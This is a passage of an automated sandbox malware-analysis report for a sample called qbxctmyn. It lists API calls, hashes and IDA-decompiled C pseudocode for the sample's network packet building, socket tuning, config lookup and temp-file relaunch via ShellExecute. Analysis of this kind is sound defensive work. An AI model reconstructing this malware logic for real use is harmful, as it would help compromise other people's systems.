                                                                                0x0040611f
                                                                                0x00406127
                                                                                0x00406127
                                                                                0x00406131
                                                                                0x00406133
                                                                                0x00406135
                                                                                0x0040618b
                                                                                0x0040618b
                                                                                0x0040618f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406191
                                                                                0x0040619e
                                                                                0x004061a4
                                                                                0x004061a6
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x00406137
                                                                                0x00406137
                                                                                0x0040613a
                                                                                0x0040613d
                                                                                0x0040613f
                                                                                0x0040613f
                                                                                0x0040615e
                                                                                0x00406164
                                                                                0x00406166
                                                                                0x00406173
                                                                                0x00406173
                                                                                0x00406176
                                                                                0x0040617a
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406168
                                                                                0x0040616b
                                                                                0x0040616e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x00406170
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x0040614a
                                                                                0x00406150
                                                                                0x00000000
                                                                                0x0040617c
                                                                                0x0040617c
                                                                                0x0040617f
                                                                                0x00406181
                                                                                0x00406181
                                                                                0x00000000
                                                                                0x00406185
                                                                                0x00406135
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x004060b5
                                                                                0x00000000

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2438460464-0
                                                                                • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
                                                                                				signed int* _v8;
                                                                                				signed int* _v12;
                                                                                				signed int* _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				signed short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v292;
                                                                                				char _v296;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* _t37;
                                                                                				intOrPtr _t41;
                                                                                				signed int* _t42;
                                                                                				signed short _t53;
                                                                                				signed int** _t62;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				intOrPtr _t71;
                                                                                				intOrPtr* _t79;
                                                                                				signed int* _t80;
                                                                                				void* _t81;
                                                                                				void* _t82;
                                                                                				void* _t83;
                                                                                
                                                                                				_t81 = __esi;
                                                                                				_t37 = 0xc;
                                                                                				_v8 = 0;
                                                                                				_v16 = 0;
                                                                                				if(_a4 >= _t37) {
                                                                                					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
                                                                                					if(_t67 < _a4) {
                                                                                						_t76 =  *(__esi + 6) & 0x0000ffff;
                                                                                						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
                                                                                						_v20 = _t41;
                                                                                						_v12 = 0;
                                                                                						if(_t41 <= 0) {
                                                                                							L13:
                                                                                							_t42 = _v16;
                                                                                							L14:
                                                                                							return _t42;
                                                                                						}
                                                                                						while(_t67 < _a4) {
                                                                                							E0040EE2A(_t76,  &_v296, 0, 0x114);
                                                                                							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
                                                                                							_t15 = _t70 + 0xa; // 0xa
                                                                                							_t83 = _t82 + 0x10;
                                                                                							if(_t15 >= _a4) {
                                                                                								goto L13;
                                                                                							}
                                                                                							_t79 = __imp__#15;
                                                                                							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
                                                                                							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
                                                                                							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
                                                                                							_v28 = _t53;
                                                                                							_t71 = _t70 + 0xa;
                                                                                							_v24 = _t71;
                                                                                							if((_t53 & 0x0000ffff) + _t71 > _a4) {
                                                                                								goto L13;
                                                                                							}
                                                                                							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
                                                                                							if(_t80 == 0) {
                                                                                								goto L13;
                                                                                							}
                                                                                							E0040EE2A(_t76, _t80, 0, 0x124);
                                                                                							E0040EE08(_t80,  &_v296, 0x114);
                                                                                							 *_t80 =  *_t80 & 0x00000000;
                                                                                							_t67 = _t71 + (_v28 & 0x0000ffff);
                                                                                							_t62 = _v8;
                                                                                							_t82 = _t83 + 0x18;
                                                                                							_v8 = _t80;
                                                                                							if(_t62 != 0) {
                                                                                								 *_t62 = _t80;
                                                                                							} else {
                                                                                								_v16 = _t80;
                                                                                							}
                                                                                							_v12 = _v12 + 1;
                                                                                							if(_v12 < _v20) {
                                                                                								continue;
                                                                                							} else {
                                                                                								goto L13;
                                                                                							}
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                					_t42 = 0;
                                                                                					goto L14;
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				intOrPtr _t30;
                                                                                				CHAR* _t31;
                                                                                				int _t34;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				void* _t47;
                                                                                				intOrPtr _t51;
                                                                                				int _t52;
                                                                                				void* _t53;
                                                                                				intOrPtr _t54;
                                                                                				void* _t55;
                                                                                				char _t59;
                                                                                
                                                                                				E0040DD05();
                                                                                				_t41 = 0x4120e8;
                                                                                				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
                                                                                				if(_t55 == 0) {
                                                                                					L9:
                                                                                					_t53 = E0040EBCC(0x1c);
                                                                                					if(_t53 != 0) {
                                                                                						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                						E00403E8F(0x4120e8, _t53);
                                                                                						__eflags = _a12;
                                                                                						if(_a12 == 0) {
                                                                                							 *(_t53 + 8) = 0;
                                                                                						} else {
                                                                                							_t15 = _t53 + 8; // 0x8
                                                                                							lstrcpynA(_t15, _a12, 0xf);
                                                                                							 *((char*)(_t53 + 0x17)) = 0;
                                                                                						}
                                                                                						L15:
                                                                                						_t42 = 0x4120e4;
                                                                                						__eflags =  *0x4120e4 - _t42; // 0x4120e4
                                                                                						if(__eflags == 0) {
                                                                                							L22:
                                                                                							_t47 = 1;
                                                                                							L11:
                                                                                							E0040DD69();
                                                                                							return _t47;
                                                                                						} else {
                                                                                							goto L16;
                                                                                						}
                                                                                						do {
                                                                                							L16:
                                                                                							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                							_t51 =  *_t42;
                                                                                							__eflags = _t30 - 0xffffffff;
                                                                                							if(_t30 == 0xffffffff) {
                                                                                								L18:
                                                                                								_t20 = _t53 + 8; // 0x8
                                                                                								_t31 = _t20;
                                                                                								__eflags =  *_t31;
                                                                                								if( *_t31 == 0) {
                                                                                									L20:
                                                                                									_t52 = _t51 + 0xc;
                                                                                									__eflags = _t52;
                                                                                									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
                                                                                									goto L21;
                                                                                								}
                                                                                								_t34 = lstrcmpA(_t51 + 0x10, _t31);
                                                                                								__eflags = _t34;
                                                                                								if(_t34 != 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								goto L20;
                                                                                							}
                                                                                							__eflags =  *(_t51 + 0xc) - _t30;
                                                                                							if( *(_t51 + 0xc) != _t30) {
                                                                                								goto L21;
                                                                                							}
                                                                                							goto L18;
                                                                                							L21:
                                                                                							_t42 =  *_t42;
                                                                                							__eflags =  *_t42 - 0x4120e4;
                                                                                						} while ( *_t42 != 0x4120e4);
                                                                                						goto L22;
                                                                                					}
                                                                                					_t47 = 0;
                                                                                					goto L11;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_t54 =  *_t41;
                                                                                					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
                                                                                						if(_a12 != 0) {
                                                                                							_t8 = _t54 + 8; // 0x74cb43e8
                                                                                							__eflags = lstrcmpA(_t8, _a12);
                                                                                						} else {
                                                                                							_t59 =  *(_t54 + 8);
                                                                                						}
                                                                                						if(_t59 == 0) {
                                                                                							break;
                                                                                						} else {
                                                                                							goto L7;
                                                                                						}
                                                                                					}
                                                                                					L7:
                                                                                					_t41 =  *_t41;
                                                                                					_t53 = 0;
                                                                                				} while ( *_t41 != 0x4120e8);
                                                                                				if(_t53 != 0) {
                                                                                					goto L15;
                                                                                				}
                                                                                				goto L9;
                                                                                			}
                                                                                0x0040e72a
                                                                                0x0040e710
                                                                                0x0040e713
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e737
                                                                                0x0040e737
                                                                                0x0040e739
                                                                                0x0040e739
                                                                                0x00000000
                                                                                0x0040e706
                                                                                0x0040e6b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e676
                                                                                0x0040e684
                                                                                0x0040e68f
                                                                                0x0040e699
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e69b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e69b
                                                                                0x0040e69d
                                                                                0x0040e69d
                                                                                0x0040e69f
                                                                                0x0040e6a1
                                                                                0x0040e6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                • lstrcmpA.KERNEL32(?,00000008,?,74CB43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: A$ A
                                                                                • API String ID: 3343386518-686259309
                                                                                • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                				long* _t33;
                                                                                				long _t35;
                                                                                				long* _t36;
                                                                                				long _t37;
                                                                                				long _t38;
                                                                                				short _t39;
                                                                                				short _t40;
                                                                                				char _t42;
                                                                                				intOrPtr _t43;
                                                                                				void* _t48;
                                                                                				long* _t49;
                                                                                				long* _t51;
                                                                                				long* _t52;
                                                                                				long* _t53;
                                                                                				long* _t54;
                                                                                				void* _t55;
                                                                                				long* _t56;
                                                                                				long* _t57;
                                                                                				long* _t60;
                                                                                				intOrPtr* _t63;
                                                                                				intOrPtr* _t65;
                                                                                				void* _t66;
                                                                                
                                                                                				_t65 = __eax;
                                                                                				_t33 =  *0x412bf8; // 0x0
                                                                                				_t42 = 0;
                                                                                				if(_t33 == 0) {
                                                                                					_t33 = E0040EBCC(0x400);
                                                                                					_pop(_t48);
                                                                                					 *0x412bf8 = _t33;
                                                                                				}
                                                                                				E0040EE2A(_t48, _t33, _t42, 0x400);
                                                                                				_t35 = GetTickCount();
                                                                                				_t49 =  *0x412bf8; // 0x0
                                                                                				_t63 = __imp__#9;
                                                                                				 *_t49 = _t35;
                                                                                				_t36 =  *0x412bf8; // 0x0
                                                                                				_t36[0] = _a12;
                                                                                				_t37 =  *_t63(1);
                                                                                				_t51 =  *0x412bf8; // 0x0
                                                                                				_t51[1] = _t37;
                                                                                				_t52 =  *0x412bf8; // 0x0
                                                                                				_t38 = 0;
                                                                                				_t52[1] = 0;
                                                                                				_t53 =  *0x412bf8; // 0x0
                                                                                				_t53[2] = 0;
                                                                                				_t54 =  *0x412bf8; // 0x0
                                                                                				_t54[2] = 0;
                                                                                				_t60 =  *0x412bf8; // 0x0
                                                                                				_t55 = 0;
                                                                                				if( *_t65 != _t42) {
                                                                                					do {
                                                                                						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                						_a12 = _t38;
                                                                                						while(_t43 != 0) {
                                                                                							if(_t43 != 0x2e) {
                                                                                								_a12 = _a12 + 1;
                                                                                								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
                                                                                						_t55 = _t55 + 1;
                                                                                						while(_t38 < _a12) {
                                                                                							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                							_t55 = _t55 + 1;
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						if( *((char*)(_t38 + _t65)) == 0x2e) {
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						_t42 = 0;
                                                                                					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                				}
                                                                                				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
                                                                                				_t24 = _t55 + 0xd; // 0xf
                                                                                				_t66 = _t24;
                                                                                				_t39 =  *_t63(0xf);
                                                                                				_t56 =  *0x412bf8; // 0x0
                                                                                				 *((short*)(_t56 + _t66)) = _t39;
                                                                                				_t40 =  *_t63(1);
                                                                                				_t57 =  *0x412bf8; // 0x0
                                                                                				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
                                                                                				return 0 | _t40 <= 0x00000000;
                                                                                			}

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040272E
                                                                                • htons.WS2_32(00000001), ref: 00402752
                                                                                • htons.WS2_32(0000000F), ref: 004027D5
                                                                                • htons.WS2_32(00000001), ref: 004027E3
                                                                                • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                  • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                  • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1802437671-0
                                                                                • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00E393C6
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00E393CD
                                                                                • CharToOemA.USER32(?,?), ref: 00E393DB
                                                                                • wsprintfA.USER32 ref: 00E39410
                                                                                  • Part of subcall function 00E392CB: GetTempPathA.KERNEL32(00000400,?), ref: 00E392E2
                                                                                  • Part of subcall function 00E392CB: wsprintfA.USER32 ref: 00E39350
                                                                                  • Part of subcall function 00E392CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00E39375
                                                                                  • Part of subcall function 00E392CB: lstrlen.KERNEL32(?,?,00000000), ref: 00E39389
                                                                                  • Part of subcall function 00E392CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 00E39394
                                                                                  • Part of subcall function 00E392CB: CloseHandle.KERNEL32(00000000), ref: 00E3939B
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00E39448
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction ID: 4385a8cf4556de4345414052e6a535112591dbbf9e280d04990f9bf2c48a0c61
                                                                                • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction Fuzzy Hash: E0018CF69001187BDB20A7619D8DEDF3ABCDB85701F0000A2BB49E2080EAB49AC5CF75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00409145(void* __eflags) {
                                                                                				char _v264;
                                                                                				char _v1288;
                                                                                				char* _t13;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                				void* _t29;
                                                                                
                                                                                				_t29 = __eflags;
                                                                                				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
                                                                                				CharToOemA( &_v264,  &_v264);
                                                                                				_t13 =  &_v264;
                                                                                				_push(_t13);
                                                                                				_push(_t13);
                                                                                				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
                                                                                				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                				_t20 = E00409064(_t29,  &_v1288,  &_v264);
                                                                                				if(_t20 != 0) {
                                                                                					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
                                                                                				}
                                                                                				return _t20;
                                                                                			}
                                                                                0x00409145
                                                                                0x00409166
                                                                                0x00409174
                                                                                0x0040917a
                                                                                0x00409180
                                                                                0x00409181
                                                                                0x004091a9
                                                                                0x004091b6
                                                                                0x004091c9
                                                                                0x004091d3
                                                                                0x00000000
                                                                                0x004091e1
                                                                                0x004091ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                • CharToOemA.USER32 ref: 00409174
                                                                                • wsprintfA.USER32 ref: 004091A9
                                                                                  • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                  • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                  • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                  • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                  • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                  • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				int _v8;
                                                                                				int _t18;
                                                                                				intOrPtr _t20;
                                                                                				CHAR* _t21;
                                                                                				int _t30;
                                                                                				CHAR* _t36;
                                                                                
                                                                                				_t18 = lstrlenA(_a12);
                                                                                				_t36 = _a4;
                                                                                				_v8 = _t18;
                                                                                				_t20 = _a8 + _t36;
                                                                                				_a8 = _t20;
                                                                                				if(_t36 >= _t20) {
                                                                                					L5:
                                                                                					_t21 = 0;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t30 = lstrlenA(_t36);
                                                                                						_t7 =  &(_t36[1]); // 0x1
                                                                                						_a4 = _t30 + _t7;
                                                                                						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
                                                                                							break;
                                                                                						}
                                                                                						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
                                                                                						if(_t36 < _a8) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t21 = _a4;
                                                                                				}
                                                                                				L6:
                                                                                				return _t21;
                                                                                			}
                                                                                0x00402429
                                                                                0x0040242b
                                                                                0x0040242e
                                                                                0x00402434
                                                                                0x00402436
                                                                                0x0040243b
                                                                                0x00402474
                                                                                0x00402474
                                                                                0x0040243d
                                                                                0x0040243d
                                                                                0x00402440
                                                                                0x00402442
                                                                                0x00402446
                                                                                0x0040244c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040246b
                                                                                0x00402472
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402472
                                                                                0x0040247b
                                                                                0x0040247b
                                                                                0x00402476
                                                                                0x0040247a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00401AC3() {
                                                                                				signed int _v8;
                                                                                				char _v12;
                                                                                				signed int _v16;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr* _t28;
                                                                                				signed int _t39;
                                                                                				void* _t41;
                                                                                				intOrPtr _t43;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                				if(_t19 == 0) {
                                                                                					L15:
                                                                                					return _v16;
                                                                                				}
                                                                                				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                				if(_t28 == 0) {
                                                                                					L14:
                                                                                					goto L15;
                                                                                				}
